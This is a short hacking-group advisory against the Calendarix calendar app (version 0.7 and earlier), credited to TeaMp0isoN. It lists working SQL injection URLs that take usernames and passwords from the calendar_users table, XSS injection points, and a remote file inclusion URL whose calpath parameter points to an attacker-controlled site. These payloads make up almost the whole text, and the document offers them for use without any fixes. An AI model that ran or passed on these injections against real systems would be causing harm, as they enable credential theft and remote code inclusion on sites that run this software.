############################################################################
# _____ __ __ ___ _ _ _ #
# |_ _| ___ __ _ | \/ | _ __ / _ \ (_) ___ ___ | \ | | #
# | | / _ \ / _` | | |\/| | | '_ \ | | | | | | / __| / _ \ | \| | #
# | | | __/ | (_| | | | | | | |_) | | |_| | | | \__ \ | (_) | | |\ | #
# |_| \___| \__,_| |_| |_| | .__/ \___/ |_| |___/ \___/ |_| \_| #
###### |_| ######
# Calendarix <= 0.7 (multiple vulnerabilities) #
# [#] Found by: TriCk aka Saywhat? #
# [#] Contact: Badnews_saywhat@hotmail.com #
# [#] Site: p0ison.org #
############################################################################
============================================================================
+++++++++++++++++++ Calendarix <= 0.7 (SQL injections) +++++++++++++++++++++
============================================================================
http://SITE.COM/PATH/calendar.php?month=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23
http://SITE.COM/PATH/calendar.php?month=&year=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23
============================================================================
++++++++++++++++++++++++ Calendarix <= 0.7 (XSS) +++++++++++++++++++++++++++
============================================================================
http://SITE.COM/PATH/calendar.php?/yearcal.php?ycyear=
http://SITE.COM/PATH//calendar.php?year=
============================================================================
++++++++++++++++++++++++ Calendarix <= 0.7 (RFI) +++++++++++++++++++++++++++
============================================================================
http://SITE.COM/PATH/cal_config.inc.php?calpath= EVIL SITE???
============================================================================
Gr33tz 2: TeaMp0isoN // Luit // Al_EPiCa // ACiD // Amarilla // p0ison.org
============================================================================
_________________________________________________________________
Windows Live: Friends get your Flickr, Yelp, and Digg updates when they e-mail you.
http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_3:092010